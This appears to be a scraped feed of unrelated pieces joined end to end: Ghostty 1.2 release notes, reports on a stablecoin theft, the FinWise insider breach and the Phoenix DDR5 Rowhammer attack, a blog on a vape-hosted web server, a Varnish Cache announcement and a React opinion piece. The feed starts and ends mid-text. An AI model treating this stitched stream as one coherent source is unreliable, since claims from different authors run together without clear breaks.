, and
write_selection_file
now support
copy
as a value to copy the file
path to the clipboard.
#7721
config
app-notifications
has a new value
config-reload
(default on)
to control whether a notification is shown when the config is reloaded.
#8366
config:
command
value can be prefixed with
shell:
or
direct:
to execute a command via the shell (default) or directly via
exec
.
#7032
config: copy on right click with
right-click-action = copy
.
#4404
config:
background-image
can be used to set a background image for
the terminal. This currently applies to each terminal, not to windows.
#3645
config:
env
can be used to specify environment variables to set
in the terminal environment.
#5257
config:
quick-terminal-size
can be used to customize the
size of the quick terminal.
#2384
config:
font-shaping-break
configures when a ligature should be
broken (split).
#4515
config: new values
cell-foreground
and
cell-background
can be used
with
selection-foreground
,
selection-background
, and
cursor-color
to set their color values to the dynamic cell colors.
#5219
config: new
bold-color
option to specify a custom color for bold to
make it easier to read.
#7168
config: new
selection-clear-on-typing
option to clear selection
when typing.
#7394
config: new
link-previews
option determines when URL previews in the
bottom of windows appear.
#7831
config: new
background-opacity-cells
applies the
background-opacity
configuration to explicit cell backgrounds (e.g. from the running program).
#7913
config: new
faint-opacity
configures the cell opacity to use for
cells marked as faint by the terminal program.
#8472
config: new
right-click-action
option can configure the behavior when
the right mouse button is clicked.
#8254
cli: pressing
enter
in
+list-themes
now shows help text on
how to configure the theme.
#4731
cli:
+list-themes
now has a flag to filter light and dark themes.
#7235
cli:
+list-colors
shows the colors in addition to their hex code.
#8393
custom shaders can now be reloaded at runtime.
#7620
custom shaders blend properly with the background color.
#7620
holding the mouse above or below the window while clicking now
scrolls the viewport without having to jiggle the mouse.
#4422
shell-integration: now uses a single
GHOSTTY_SHELL_INTEGRATION_FEATURES
env var to specify enabled features instead of multiple env vars.
#6871
shell-integration/elvish: use the
kitty-shell-cwd://
scheme for OSC 7
reporting so we don't have to encode it.
#7033
Split and tab navigation keybinds such as
goto_split
and
next_tab
support
performable
.
#7680
font: improve the performance of glyph hashing for caching yielding
a roughly 5% speed in synthetic stress tests.
#7677
fix crash that could happen with certain
font-family
flags provided
specifically to the CLI.
#7481
The config
adjust-cursor-thickness
now works with
cursor-style=underline
.
#7732
Resolve issue when pressing
backspace
with preedit text (such as
when using an IME).
#5728
config:
keybind=
(blank) restores default keybindings, behaving
like other
<key>=
blank values.
#5936
config:
palette
configuration now supports whitespace between
the palette number and color.
#5921
config: All configurations that take a list of colors (e.g.
macos-icon-ghost-color
) support spaces after commas.
#5918
the
copy_url_to_clipboard
keybind action works properly with OSC 8
hyperlinks.
#7499
font: fallback fonts sizes are automatically adjusted to more closely match
the primary font size visually.
#7840
font: Support new sprites: U+1CC00 to U+1CCFF, U+1CE00 to U+1CEFF, U+2500
to U+25FF, U+1CE00 to U+1CEFF, U+1FB00 to U+1FBFF.
#7755
#7761
font: U+25E4 and U+25E2 (geometric shapes) are now rasterized
with the built-in sprite font.
#3344
font: corner pieces of Geometric Shapes are now rasterized with
the built-in sprite font.
#7562
font: glyph constraint logic dramatically improved, resulting in things like
Nerd Font icons appearing more correctly.
#7809
input: for keyboards that support it, the
copy
and
paste
physical
keys now bind by default to
copy_to_clipboard
and
paste_from_clipboard
,
respectively.
#8586
input: the default
copy_to_clipboard
bindings are marked as performable,
meaning the key will be encoded to the pty if there is no text to copy.
This allows TUIs to capture this.
#8504
input: mouse scrollwheel mapping to mouse events was modified to
better match other terminal emulators.
#6052
input:
ctrl+<ASCII>
works across a wider variety of keyboard layouts.
#7309
input: mouse dragging while clicking cancels any mouse link actions.
#7080
input: the
goto_tab
binding now binds by default to both the physical
and logical numeric keys to work with more keyboard layouts.
#8486
renderer: micro-optimization to improve cached glyph lookup performance
#8536
.
gracefully handle the case that the
exec
syscall fails when starting the
terminal command.
#7793
The "failed to launch process" error message can no longer be dismissed by
pressing a modifier key.
#7794
fix rendering issues when rectangular selection with top-left or bottom-right
outside of the viewport.
#7692
fix some rounding errors for octant rendering which caused octants to not
line up in some scenarios.
#7479
fix some mouse selection logic which sometimes caused Ghostty to incorrectly
select an extra line or character.
#7444
fix file path regular expression to require at least one slash.
#7355
fix a crash when reflowing a grapheme with a spacer head in a specific
location.
#7537
Images rendered using the Kitty image protocol now use correct gamma
blending.
#7368
Fix scenario where renderer could crash when zooming out if the viewport
pointer when out of bounds.
#7899
Fix a crash that could happen if a memory page ran out of space for
hyperlinks.
#8009
Fix undefined memory access on first frame render.
#7982
Fix memory leak each time the modifier was held to search for links.
#7998
Fix crashes when our bitmap allocator had exactly 64 chunks allocated.
#8276
Fix possible use-after-free in font atlas error paths. There are no known
cases of this being exercised in the wild.
#8249
Fix possible crashes in some internal OOM conditions where growing the
backing buffer was not implemented properly.
#8277
Fix undefined memory access in OSC parser that could lead to crashes.
#8307
shell-integration/bash: no longer depends on a valid
GHOSTTY_RESOURCES_DIR
env var.
#7611
shell-integration/bash: fix a scenario where garbage characters could be
printed.
#7802
shell-integration/bash: preserve existing env more reliably.
#7908
Do not resolve symbolic links in OSC 7 path reporting.
#7773
Bundled themes updated to
release-20250915-154825-b4500fc
.
This may rename existing themes. If your theme stops working, please check
to see if the theme was renamed. The renames are done upstream so there
isn't any way for us to avoid them.
inspector: fix display of fractional pixel sizes.
#8179
contrib/vim: fix syntax highlighting of the config in scratch buffers.
#7119
This section covers the changes to terminal emulation and other capabilities
exposed to applications running inside the terminal.
Ghostty remains focused
on terminal emulator compatibility so the changes in Ghostty 1.2 only add
or improve compatibility with features in other terminal emulators. In future
versions of Ghostty, we plan to add new Ghostty-specific features that
application developers can take advantage of.
vt: parse more ConEmu OSC 9 sequences. The only ConEmu OSC 9 sequence that
Ghostty reacts to is the
9;4
progress bar sequence. The remainder are
parsed but ignored.
#8410
vt: Significant improvements in feature support and compatibility of
color operations with xterm. Specifically OSC 4, 5, 10-19, 104, 105, and
110-119. This adds new sequence support in addition to fixing compatibility
of previously supported color operations.
#8590
vt: Indicate support for OSC 52 in the primary DA report.
#7725
vt: OSC 4/104 allow multiple color specifications.
#7402
vt: Allow SGR sequences to contain up to 24 parameters, fixing some
Kakoune themes.
#8417
vt: OSC 52 can empty the current clipboard by sending an empty string.
#8018
vt:
XTGETTCAP
works properly for lowercase hex characters.
#7229
vt: Kitty image protocol supports delete by range operations.
#5957
vt: Fix aspect ratio issues with some images using the Kitty image
protocol.
#6673
vt: Kitty image protocol should accept commands with no control data.
#7023
vt: don't force Kitty images to a grid size.
#7367
vt: fix a variety of alt screen edge cases for mode 47, 1047, and 1049 to
better match xterm behavior. I don't know any real programs that exercised
these bugs, but its good hygiene.
#7471
vt: clear hyperlink state when switching between normal and alt screen.
#7471
vt:
ctrl+esc
now produces the proper Kitty keyboard encoding.
#7000
vt: clear correct row on index (
\n
) operation in certain edge cases.
This fixes a misrender that could happen with the vim status line
in certain scenarios.
#7093
vt: clicking on an unfocused window no longer encodes a mouse event.
#2595
vt: fix undefined memory access on certain incomplete escape sequences.
#8007
vt: OSC 9 notifications can contain single character messages.
#8396
vt: when VS15 makes a default wide character narrow, the cursor moves back
one cell.
#8538
macOS: Support macOS 26 (Tahoe).
macOS: You can now undo and redo closing any type of terminal (window, tab,
or split). We keep recently closed terminals in memory for a configurable
amount of time (default 10 seconds) so you can recover them if you close
them by accident.
#7535
macOS: Read-only accessibility API integration allows screen readers
to read Ghostty's structure and contents. This is also useful for AI software
to read Ghostty's contents. This requires accessibility permissions, so it is
opt-in.
#7601
macOS: Integration with App Intents enables Ghostty to be automated with
Apple Shortcuts.
#7634
macOS: Bell implementation. By default, the bell will bounce the dock icon
and put a bell emoji in the title. This is cleared when the terminal is
focused or on any input. The bell does not make any audio sounds. These
can all be disabled with
bell-features
.
#7099
macOS: Scripts executed from Finder or dropped onto the dock now execute
via the login shell and sending
<filepath>; exit
via stdin. This is how
the built-in Terminal and other terminals work to allow loading your
login scripts.
#7647
macOS: Custom icons are now persisted while Ghostty is not running.
#8230
macOS: Display a native GUI progress bar for
OSC 9;4
progress bar sequences.
#8477
macOS: Add
bring_all_to_front
keybind action to bring all
Ghostty windows to the front.
#4704
macOS: Add
reset_window_size
keybind action to reset the window
size to its initial configured size.
#6038
macOS: Add "Return to Default Size" menu item.
#1328
macOS:
macos-hidden
configuration will hide Ghostty from the
dock and tab menu.
#4538
macOS: Clicking links now uses the
NSWorkspace
API rather than
the
open
command. This preserves the source application (Ghostty)
which other programs can now use to change their behavior if
desired.
#5256
macOS: New config
macos-window-buttons
to hide the traffic light
buttons.
#7504
macOS: New option
padded-notch
for the existing
macos-non-native-fullscreen
configuration to put the non-native fullscreen window below the notch
but still hide the menu bar.
#5750
macOS: New keybind action and menu item
toggle_window_float_on_top
to
have a specific terminal window float above all other windows even when
unfocused.
#7237
macOS: Equalize splits now works in the quick terminal.
#7480
macOS:
quick-terminal-position=center
now supports resize while retaining
the center position.
#8398
macOS: Scripts executed from Finder or dropped onto the dock always
require manual confirmation to run.
#8442
macOS: The reset zoom button for splits is now visible with titlebar tabs
and a single tab.
#7502
macOS:
window-save-state
now saves terminal titles.
#7938
macOS:
Cmd+h
(macOS hide window) no longer sends
h
if attempting to
hide the last visible window.
#5929
macOS:
maximize
configuration now works on macOS.
#5928
macOS: Improve key input handling speed by about 10x.
#7121
macOS: Differentiate between closing a tab vs a window when pressing the
red traffic light.
#7618
macOS: Title text is vertically centered with
macos-titlebar-style=tabs
.
#5777
macOS: Ghostty launched via the CLI now comes to the front.
#8546
macOS: focus no longer goes to the first split when toggling
non-native fullscreen.
#6999
macOS: Fix crash that would occur if non-native fullscreen and
fullscreen = true
were both set.
#7277
macOS: If
title
is set, the title is set on the window on load,
allowing window managers to see the title sooner.
#6056
macOS: Any keypress with
cmd
pressed is not encoded for legacy
key encoding.
#6057
macOS: Invoking
new_tab
in any way within the quick terminal now
shows a helpful error rather than creating a new window. Tabs in the
quick terminal will be supported in a future release.
#5939
macOS: Closing non-native fullscreen windows no properly restores
the menu bar.
#7525
macOS: Dismiss any notifications on window focus.
#7531
macOS: Dismiss any notifications on window close.
#7531
macOS: Dismiss any notifications of an already-focused window after
a few seconds.
#7531
font/coretext: improve font search sorting to be more consistent.
#7483
man pages now mention macOS-specific configuration path.
#5938
GTK: Support for FreeBSD. This work was all driven by a single community
member and we are very grateful for their contributions.
#7606
GTK: New icon that matches a wider variety of desktop environments
stylistically. This is never going to be perfect due to the diversity of
the Linux/BSD ecosystems, but the new icon is a big improvement and makes
the app feel less macOS-centric.
#8038
GTK: Configuration can be reloaded by sending
SIGUSR2
to Ghostty.
#7759
GTK: A new
gtk-titlebar-style=tabs
puts the tabs into the titlebar
of windows.
#8166
GTK: The quick terminal now works on Linux under Wayland and the
wlr-layer-shell
protocol.
#4624
GTK:
global:
keybinds now work whenever XDG desktop portal
is available (almost all desktop environments).
#6051
GTK: Display a native GUI progress bar for
OSC 9;4
progress bar sequences,
such as those emitted by systemd.
#7975
GTK: Audio bell support (default off) can be enabled with
bell-features=audio
and setting
bell-audio-path
and
bell-audio-volume
.
#5326
GTK: Install DBus and Systemd activation services for faster startup.
#7433
GTK: OpenGL renderer now supports linear blending for more correct
color blending.
#7620
GTK: Register the
X-KDE-Shortcut
key so that a shortcut can be registered
on KDE to open Ghostty.
#7673
GTK: Dynamically choose between
io_uring
and
epoll
for the
async API on Linux. Previously, this was hardcoded to
io_uring
and epoll-only systems had to build from source.
#5916
GTK: New config
async-backend
can be set to
epoll
to force using
epoll instead of io_uring on Linux. This can be useful on kernels where
iowait reporting is broken.
#5916
GTK: New config
window-show-tab-bar
customizes when the tab bar
is visible.
#5590
GTK: New config
quick-terminal-keyboard-interactivity
to specifically
customize the keyboard interactivity setting on Wayland.
#7477
GTK: New keybind action
show_gtk_inspector
to show the GTK inspector
since terminal keybinds usually clobber the GTK default.
#7468
GTK: The new tab button now has a dropdown menu to create new splits.
#7127
GTK: A new "remember choice" toggle is added to the clipboard confirmation
dialog.
#6783
GTK: A new native GUI element is used to show when a command exits
improperly or while
wait-after-command
is set.
#7836
GTK: If
title
is set, windows are initialized with the title immediately,
rather than after the surface is initialized. This lets window managers
read and use this value.
#8535
GTK: Show a native GUI element if the OpenGL renderer fails to initialize
rather than a blank window.
#8390
GTK: Escape
(
and
)
when dropping filepaths onto the terminal.
#6922
GTK:
copy-on-select=clipboard
no longer causes toast spam while
selecting. The copy only happens when the mouse is released.
#4800
GTK: All split directions are now available in the menubar and
context menus.
#5779
GTK: Windows do not request close confirmation for
wait-after-command
.
#7500
GTK: When server-side decorations are used, remove the
solid-csd
CSS class from windows that resulted in a visible border.
#8127
GTK: Fix an issue where the window would sometimes become blank
and not close after the last tab was closed.
#5837
GTK: Resize overlay now uses language-neutral
w x h
format
and omits units.
#6013
GTK: Clean up surface cgroup properly on close.
#6766
GTK: Reduce flickering/stretching on resize for OpenGL.
#7155
GTK: Detect
GHOSTTY_RESOURCES_DIR
in more installation environments.
#6814
GTK: Fix cases where
xdg-open
calls would leave defunct processes.
#7657
GTK/X11: Fix blur regions when using > 200% scaling.
#6978
font/freetype: true bitmap fonts are now supported.
#8512
font/freetype: fix possible crashes when using a font with no SFNT tables.
#8483
font/freetype: error when loading SVG glyphs, since we don't support them
anyways.
#6824
font/freetype: fix data races that could cause crashes in rare scenarios.
#7238
font/freetype: convert more non-UTF-8 encodings of font names to UTF-8.
#8204
packaging: experimental snap packaging is now tested in CI. The
published snap image is maintained by an external maintainer for now.
#3931
We now generate source tarballs with some preprocessed files as is
standard with many source tarballs (e.g. converting parser
.y
to
.c
).
For Ghostty, we preprocess Blueprint
ui
to
xml
files, translations,
and GTK resource files. This allows Ghostty to be built on older platforms
without access to newer build tools.
Packagers should use the source
tarball, not the Git checkout. The
PACKAGING.md
documentation has been
updated with this information.
#6800
The GLFW apprt has been deleted. This was never a supported apprt and
was only used for development and testing. We warned against packaging GLFW
in our
PACKAGING.md
documentation. This is now gone because we don't need
it for development or testing anymore.
#7815
The "tip" releases do not overwrite previously released tips with the
same commit. This ensures that checksums remain stable once a release
is cut. For packagers that provide tip packages, this should improve
security and compatibility with tooling. Tip releases have always been
signed.
#8549
Ghostty 1.2 now comes with a configuration to build for Flatpak as well as
Snap. We test this for every commit in CI and strive to keep Ghostty
working via these distribution methods. However, we do not officially
provide or maintain Flatpak or Snap packages, yet.
This is major progress: Ghostty 1.1.x didn't work at all as a Flatpak
or Snap package without pataches, and the official project made no guarantees
about maintaining these packages. Now, we at least build and test on these
platforms, while still falling short of official distribution.
Our major blocker for official distribution is
maintainer interest
and release automation. None of the current Ghostty maintainers main the
Snap or Flatpak builds of Ghostty, and we don't feel confident in our
ability to maintain these packages long term. If you are interested in
helping maintain the Flatpak or Snap packages of Ghostty, please join
Discord and message us in
#packaging
.
Ghostty 1.3 will continue the focus of making Ghostty the
"best existing terminal emulator"
by shipping the last remaining major missing features to achieve
parity with other popular terminal emulators. Namely, we plan on shipping
scrollback search and scrollbars for 1.3, at a minimum.
2
The primary focus of Ghostty 1.3 will be on desktop application features
(of which scrollback search and scrollbars are a part). The core terminal
emulation features of Ghostty have already proven to be very feature
rich and stable. However, we plan on continuing to expand our VT feature
support, such as adopting new experimental protocols that have been recently
released into the ecosystem by others.
To answer common requests,
Windows
and
libghostty as a
standalone library
are not planned for Ghostty 1.3. These remain part
of the long term roadmap, but we want to focus on our existing platforms
and desktop applications first.
Ghostty will move to a 6-month release cycle for major/minor releases,
with the next minor release (1.3.0) planned for March 2026. A March/September
release cycle aligns well with many major Linux distributions and macOS.
Patch releases (e.g. 1.2.1) will be made as needed on an unscheduled basis.
This is a relatively long release cycle for modern applications, but
lets the development team focus on large, impactful features with enough
time to stabilize in tip releases. For packagers, it avoids the churn of
packaging new releases frequently. And the alignment with major OS releases
lets us ensure we ship major releases that work well on new OS versions.
For users who are interested in more frequent updates, we recommend using
the
tip
release channel
on macOS or
building from source
frequently on Linux.
We have thousands of nightly users (thank you for testing!) and the entire
maintainer team works hard to keep tip releases stable. For the entire 1.1
to 1.2 development cycle, I can't remember tip releases ever being broken
for daily use.
I didn't do a full survey of this, but I couldn't find any other
terminal emulator that supported both OSC 9 notifications, OSC 777 notifications,
and
OSC
9;4
progress bars.
↩
"Parity" here is used loosely to describe the most popular, frequently
used features of other terminal emulators. There is a long tail of features
we'll likely never fully implement (and vice versa for our features).
↩
Yala stablecoin depegs after theft
Web3 Is Going Great
web3isgoinggreat.com
2025-09-15 19:19:50
The YU bitcoin-backed stablecoin list its intended dollar peg after what they described as "an attempted attack", later writing that there was an "unauthorized transfer of funds". Although they initially wrote that "All funds are safe", they later stated that they "identified the stolen ass...
The YU bitcoin-backed
stablecoin
list its intended dollar
peg
after what they described as "an attempted attack", later writing that there was an "unauthorized transfer of funds". Although they initially wrote that "All funds are safe", they later stated that they "identified the stolen assets on-chain and are actively working with law enforcement to pursue recovery." Research firm Lookonchain observed a large mint of the YU token that may have been related — if so, the attacker successfully stole at least 1,501 ETH ($6.75 million), and holds a substantial quantity of YU they still haven't sold.
Despite the project's attempted reassurances, the YU stablecoin lost its $1 peg, plummeting as low as around $0.20. As of writing, about a day later, the stablecoin is still well below its peg, at around $0.94.
FinWise insider breach impacts 689K American First Finance customers
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 19:18:10
FinWise Bank is warning on behalf of corporate customers that it suffered a data breach after a former employee accessed sensitive files after the end of their employment. [...]...
FinWise Bank is warning on behalf of corporate customers that it suffered a data breach after a former employee accessed sensitive files after the end of their employment.
"On May 31, 2024, FinWise experienced a data security incident involving a former employee who accessed FinWise data after the end of their employment," reads a data breach notification sent by FinWise on behalf of American First Finance (AFF).
American First Finance (AFF) is a company that offers consumer financing products, including installment loans and lease-to-own programs, for a diverse range of products and services. Customers use AFF to apply for and manage the loans, with the company handling the services, account setup, repayment process, and customer support.
FinWise partners with American First Finance by serving as the bank that originates and funds these loans.
According to a filing with the
Maine Attorney General's office
, American First Finance disclosed that the FinWise Bank data breach impacted the data of 689,000 of its customers. The filing included a notification letter prepared by FinWise on behalf of American First Finance, confirming that the bank itself was the source of the incident.
FinWise said that files containing customer information, including full names and other personal data elements, were accessed during the breach, but redacted the complete list of exposed data breach notification.
The company did not disclose how the ex-employee was able to access this data after they were no longer employed or the total number of people impacted by the FinWise breach.
Upon discovery, the bank launched an investigation with outside cybersecurity professionals to assess the scope of the exposure.
FinWise says it has strengthened internal controls to reduce the risk of similar incidents and is offering 12 months of free credit monitoring and identity theft protection services to those impacted.
BleepingComputer contacted FinWise Bank to learn more about the breach, but a FinWise spokesperson said they do not comment on ongoing litigation.
However, the company shared a link to a recent quarterly SEC filing (
June 30, 2025 Form 10-Q
), in which the company notes that approximately 600,000 people were impacted, a number similar to the one cited by American First Finance.
The company is now facing multiple class-action lawsuits related to the data breach.
New Phoenix attack bypasses Rowhammer defenses in DDR5 memory
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 19:01:24
Academic researchers have devised a new variant of Rowhammer attacks that bypass the latest protection mechanisms on DDR5 memory chips from SK Hynix. [...]...
Academic researchers have devised a new variant of Rowhammer attacks that bypass the latest protection mechanisms on DDR5 memory chips from SK Hynix.
A Rowhammer attack works by repeatedly accessing specific rows of memory cells at high-speed read/write operations to cause enough electrical interference to alter the value of the nearby bits from one to zero and vice-versa (bit flipping).
An attacker could potentialluy corrupt data, increase their privileges on the system, execute malicious code, or gain access to sensitive data.
One defense mechanism against Rowhammer attacks is called Target Row Refresh (TRR), which prevents bit flips by issuing an extra refresh command when detecting frequent accesses to a particular row.
Hammering DDR5 for privilege escalation
A team of researchers in the Computer Security Group (COMSEC) at ETH Zurich University in Switzerland and Google created a new DDR5 Rowhammer attack they call Phoenix, which can flip bits in memory chips to enable malicious activity.
The tests were carried out on DDR5 products from Hynix, one of the largest memory chip makers with an estimated 36% of the market, but the security risk may extend to products from other vendors as well.
After reverse-engineering the complex protections that Hynix implemented against Rowhammer and learning how they worked, the researchers discovered that certain refresh intervals were not sampled by the mitigation, which could be exploited.
They also developed a method for Phoenix to track and synchronize with thousands of refresh operations by self-correcting when it detects a missed one.
To evade TRR protections, the Rowhammer patterns in the Phoenix attack cover 128 and 2608 refresh intervals and hammer specific activation slots only at precise moments.
Using their model, the researchers were able to flip bits on all 15 DDR5 memory chips in the test pool and created the first Rowhammer privilege escalation exploit.
During tests, it took them less than two minutes to get a shell with root privileges “on a commodity DDR5 system with default settings.”
Additionally, the researchers also explored the possibility of practical exploitation using the Phoenix attack method to take control of a target system.
When targeting page-table entries (PTEs) to craft an arbitrary memory read/write primitive, they found that all products in the test are vulnerable.
In another test, they targeted RSA-2048 keys of a co-located VM to break SSH authentication and discovered that 73% of the DIMMs are exposed.
In a third evaluation, the researchers found that they could alter the sudo binary to increase their local privileges to root level on 33% of the tested chips.
All tested DDR5 modules are vulnerable to the new Phoenix Rowhammer attack
source: COMSEC ETH Zurich
The table above shows that all memory chips tested are vulnerable to one of the Rowhammer patterns used in the Phoenix attack. The shorter one with 128 refresh intervals is more effective, though, generating more bit flips on average.
Phoenix is currently tracked as CVE-2025-6202 and received a high-severity score. It affects all DIMM RAM modules produced between January 2021 and December 2024.
Although Rowhammer is an industry-wide security problem that cannot be corrected for existing memory modules, users can stop Phoenix attacks by tripling the DRAM refresh interval (tREFI).
However, this kind of stress may cause errors or data corruption and render the system unstable.
The researchers also shared a
repository
with resources to reproduce the Phoenix attack, which includes experiments based on Field-Programmable Gate Array (FPGA) to reverse-engineer TRR implementations, and the code for the proof-of-concept exploits.
This article is
NOT
served from a web server running on a disposable vape. If you want to see the real deal, click
here
. The content is otherwise identical.
For a couple of years now, I have been collecting disposable vapes from friends and family. Initially, I only salvaged the batteries for “future” projects (It’s not hoarding, I promise), but recently, disposable vapes have gotten more advanced. I wouldn’t want to be the lawyer who one day will have to argue how a device with USB C and a rechargeable battery can be classified as “disposable”. Thankfully, I don’t plan on pursuing law anytime soon.
Last year, I was tearing apart some of these fancier pacifiers for adults when I noticed something that caught my eye, instead of the expected black blob of goo hiding some ASIC (Application Specific Integrated Circuit) I see a little integrated circuit inscribed “PUYA”.
I don’t blame you if this name doesn’t excite you as much it does me, most people have never heard of them. They are most well known for their flash chips, but I first came across them after reading Jay Carlson’s blog post about
the cheapest flash microcontroller you can buy
. They are quite capable little ARM Cortex-M0+ micros.
Over the past year I have collected quite a few of these PY32 based vapes, all of them from different models of vape from the same manufacturer. It’s not my place to do free advertising for big tobacco, so I won’t mention the brand I got it from, but if anyone who worked on designing them reads this, thanks for labeling the debug pins!
The chip is marked
PUYA C642F15
, which wasn’t very helpful. I was pretty sure it was a
PY32F002A
, but after poking around with
pyOCD
, I noticed that the flash was 24k and we have 3k of RAM. The extra flash meant that it was more likely a
PY32F002B
, which is actually a very different chip.
1
So here are the specs of a microcontroller so
bad
, it’s basically disposable:
24MHz Coretex M0+
24KiB of Flash Storage
3KiB of Static RAM
a few peripherals, none of which we will use.
You may look at those specs and think that it’s not much to work with. I don’t blame you, a 10y old phone can barely load google, and this is about 100x slower. I on the other hand see a
blazingly
fast web server.
The idea of hosting a web server on a vape didn’t come to me instantly. In fact, I have been playing around with them for a while, but after writing my post on
semihosting
, the penny dropped.
If you don’t feel like reading that article, semihosting is basically syscalls for embedded ARM microcontrollers. You throw some values/pointers into some registers and call a breakpoint instruction. An attached debugger interprets the values in the registers and performs certain actions. Most people just use this to get some logs printed from the microcontroller, but they are actually bi-directional.
If you are older than me, you might remember a time before Wi-Fi and Ethernet, the dark ages, when you had to use dial-up modems to get online. You might also know that the ghosts of those modems still linger all around us. Almost all USB serial devices actually emulate those modems: a 56k modem is just 57600 baud serial device. Data between some of these modems was transmitted using a protocol called SLIP (Serial Line Internet Protocol).
2
This may not come as a surprise, but Linux (and with some tweaking even macOS) supports SLIP. The
slattach
utility can make any
/dev/tty*
send and receive IP packets. All we have to do is put the data down the wire in the right format and provide a virtual tty.
This is actually easier than you might imagine, pyOCD can forward all semihosting though a telnet port. Then, we use
socat
to link that port to a virtual tty:
pyocd gdb -S -O semihost_console_type=telnet -T $(PORT)$(PYOCDFLAGS) &
socat PTY,link=$(TTY),raw,echo=0 TCP:localhost:$(PORT),nodelay &
sudo slattach -L -p slip -s 115200$(TTY) &
sudo ip addr add 192.168.190.1 peer 192.168.190.2/24 dev sl0
sudo ip link set mtu 1500 up dev sl0
Ok, so we have a “modem”, but that’s hardly a web server. To actually talk TCP/IP, we need an IP stack. There are many choices, but I went with
uIP
because it’s pretty small, doesn’t require an RTOS, and it’s easy to port to other platforms.
It also, helpfully, comes with a very minimal HTTP server example.
After porting the SLIP code to use semihosting, I had a working web server…half of the time.
As with most highly optimised libraries, uIP was designed for 8 and 16-bit machines, which rarely have memory alignment requirements. On ARM however, if you dereference a
u16 *
, you better hope that address is even, or you’ll get an exception. The
uip_chksum
assumed
u16
alignment, but the script that creates the filesystem didn’t.
I actually decided to modify a bit the structure of the filesystem to make it a bit more portable.
This was my first time working with
perl
and I have to say, it’s quite well suited to this kind of task.
So how fast is a web server running on a disposable microcontroller. Well, initially, not very fast. Pings took ~1.5s with 50% packet loss and a simple page took over 20s to load. That’s so bad, it’s actually funny, and I kind of wanted to leave it there.
However, the problem was actually between the seat and the steering wheel the whole time. The first implementation read and wrote a single character at a time, which had a massive overhead associated with it. I previously benchmarked semihosting on this device, and I was getting ~20KiB/s, but uIP’s SLIP implementation was designed for very low memory devices, so it was serialising the data byte by byte.
We have a whopping 3kiB of RAM to play with, so I added a ring buffer to cache reads from the host and feed them into the SLIP poll function. I also split writes in batches to allow for escaping.
Now this is what I call blazingly fast! Pings now take 20ms, no packet loss and a full page loads in about 160ms. This was using using almost all of the RAM, but I could also dial down the sizes of the buffer to have more than enough headroom to run other tasks. The project repo has everything set to a nice balance latency and RAM usage:
Memory region Used Size Region Size %age Used
FLASH: 5116 B 24 KB 20.82%
RAM: 1380 B 3 KB 44.92%
For this blog however, I paid for none of the RAM, so I’ll use all of the RAM.
As you may have noticed, we have just under 20kiB (80%) of storage space. That may not be enough to ship all of React, but as you can see, it’s more than enough to host this entire blog post.
And this is not just a static page server, you can run any server-side code you want, if you know C that is.
Just for fun, I added a json api endpoint to get the number of requests to the main page (since the last crash) and the unique ID of the microcontroller.
Version
8.0.0 of Varnish Cache
has been released. In addition to a number
of changes to varnishd parameters, the ability to access some
runtime parameters using the Varnish Configuration Language, and other
improvements, 8.0.0 comes with big news; the project is forming an
organization called a fore...
parameters, the ability to access some
runtime parameters using the Varnish Configuration Language, and other
improvements, 8.0.0 comes with
big news
; the project is forming an
organization called a
forening
that will set out formal governance for the project.
The move also comes with a name change due to legal difficulties in
securing the Varnish Cache name:
The new association and the new project will be named "The Vinyl
Cache Project", and this release 8.0.0, will be the last under the
"Varnish Cache" name. The next release, in March will be under the new
name, and will include compatility scripts, to make the transition as
smooth as possible for everybody.
I want to make it absolutely clear that this is 100% a mess of my
making: I should have insisted on a firm written agreement about the
name sharing, but I did not.
I will also state for the record, that there are no hard feelings
between Varnish Software and the FOSS project.
Varnish Software has always been, and still is, an important and
valued contributor to the FOSS project, but sometimes even friends can
make a mess of a situation.
React Won by Default – and It's Killing Front End Innovation
React didn’t win purely on technical merit. It won by default. That default is now slowing innovation across the frontend ecosystem.
When teams need a new frontend, the conversation rarely starts with “What are the constraints and which tool best fits them?” It often starts with “Let’s use React; everyone knows React.” That reflex creates a self-perpetuating cycle where network effects, rather than technical fit, decide architecture.
Meanwhile, frameworks with real innovations struggle for adoption. Svelte compiles away framework overhead. Solid delivers fine-grained reactivity without virtual-DOM tax. Qwik achieves instant startup via resumability. These approaches can outperform React’s model in common scenarios, but they rarely get a fair evaluation because React is chosen by default.
React is excellent at many things. The problem isn’t React itself, it’s the React-by-default mindset.
The Innovation Ceiling
React’s technical foundations explain some of today’s friction. The virtual DOM was a clever solution for 2013’s problems, but as Rich Harris outlined in
“Virtual DOM is pure overhead”
, it introduces work modern compilers can often avoid.
Hooks addressed class component pain but introduced new kinds of complexity: dependency arrays, stale closures, and misused effects. Even React’s own docs emphasize restraint:
“You Might Not Need an Effect”
. Server Components improve time-to-first-byte, but add architectural complexity and new failure modes.
The
React Compiler
is a smart solution that automates patterns like
useMemo
/
useCallback
. Its existence is also a signal: we’re optimizing around constraints baked into the model.
Contrast this with alternative approaches: Svelte 5’s
Runes
simplify reactivity at compile time; Solid’s
fine-grained reactivity
updates exactly what changed; Qwik’s
resumability
eliminates traditional hydration. These aren’t incremental tweaks to React’s model—they’re different models with different ceilings.
Innovation without adoption doesn’t change outcomes. Adoption can’t happen when the choice is made by reflex.
The Technical Debt We’re All Carrying
Defaulting to React often ships a runtime and reconciliation cost we no longer question. Even when it’s fast enough, the ceiling is lower than compile-time or fine-grained models. Developer time is spent managing re-renders, effect dependencies, and hydration boundaries instead of shipping value. The broader lesson from performance research is consistent: JavaScript is expensive on the critical path (
The Cost of JavaScript
).
We’ve centered mental models around “React patterns” instead of web fundamentals, reducing portability of skills and making architectural inertia more likely.
The loss isn’t just performance, it’s opportunity cost when better-fit alternatives are never evaluated. For instance, benchmarks like the
JS Framework Benchmark
show alternatives like Solid achieving up to 2-3x faster updates in reactivity-heavy scenarios compared to React.
The Frameworks Being Suffocated
Svelte: The Compiler Revolution
Svelte shifts work to compile time: no virtual DOM, minimal runtime. Components become targeted DOM operations. The mental model aligns with web fundamentals.
But “not enough jobs” keeps Svelte adoption artificially low despite its technical superiority for most use cases. Real-world examples, like The Guardian’s adoption of Svelte for their frontend, demonstrate measurable gains in performance and developer productivity, with reported reductions in bundle sizes and faster load times. For instance, as detailed in
Wired’s article on Svelte
, developer Shawn Wang (
@swyx
on X/Twitter) reduced his site’s size from 187KB in React to just 9KB in Svelte by leveraging its compile-time optimizations, which shift framework overhead away from runtime. This leads to faster, more efficient apps especially on slow connections.
Solid: The Reactive Primitive Approach
